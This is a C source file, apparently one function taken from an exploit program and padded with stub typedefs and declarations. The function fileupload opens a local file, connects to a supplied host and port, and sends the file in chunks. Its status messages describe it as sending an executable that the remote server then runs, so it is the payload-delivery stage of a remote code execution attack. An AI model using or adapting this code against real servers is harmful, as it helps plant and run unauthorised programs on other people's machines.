
typedef unsigned long size_t;
typedef long intptr_t; typedef unsigned long uintptr_t;
typedef long scalar_t__;

typedef int bool;






struct in_addr {int dummy; } ;
struct sockaddr_in {struct in_addr sin_addr; int sin_port; int sin_family; } ;
struct sockaddr {int dummy; } ;
struct hostent {scalar_t__ h_addr; } ;
typedef int buf ;
typedef int FILE ;


 int AF_INET ;
 int SOCK_STREAM ;
 int Sleep (int) ;
 int WSACleanup () ;
 int closesocket (int) ;
 int connect (int,struct sockaddr*,int) ;
 int feof (int *) ;
 int * fopen (char*,char*) ;
 int fread (char*,int,int,int *) ;
 struct hostent* gethostbyname (char*) ;
 int htons (int) ;
 int printf (char*) ;
 int send (int,char*,int,int ) ;
 int socket (int ,int ,int ) ;

int fileupload(int port,char *FileName,char* ip){

FILE* file;


int sockfd, numbytes;

struct hostent *he;
struct sockaddr_in their_addr;
char buf[1024];
char *a=((void*)0);
int read=0;


printf("[+] Opening File\n");

file = fopen(FileName,"rb");
if (file==((void*)0)) {
printf("[-] Open Failed\n");
return 0;
}
printf("[+] File found ready to send\n");

if ((he=gethostbyname(ip)) == ((void*)0)) {
printf("[-] GetHostByName() Error!\n");
return 0;
}
if ((sockfd = socket(AF_INET, SOCK_STREAM, 0)) == -1) {
printf("[-] Can't open socket!\n");
return 0;
}
their_addr.sin_family = AF_INET;
their_addr.sin_port = htons(port);
their_addr.sin_addr = *((struct in_addr *)he->h_addr);

if (connect(sockfd, (struct sockaddr *)&their_addr,sizeof(struct sockaddr)) == -
1) {
printf("[-] Connecting error\n");
return 0;
}
printf("[+] Connected\n[+] Sending executable.\n");

while (!feof(file)) {
read = fread(buf,sizeof(char),sizeof(buf),file);
Sleep(200);
if ((numbytes=send(sockfd,buf,read,0)) == -1) {
printf("[-] Sending executable failed\n");
return 0;
}
printf(".");
}
printf("\n[+] All done, server have now executed your executable!\n");
closesocket(sockfd);
WSACleanup();
return 1;
}
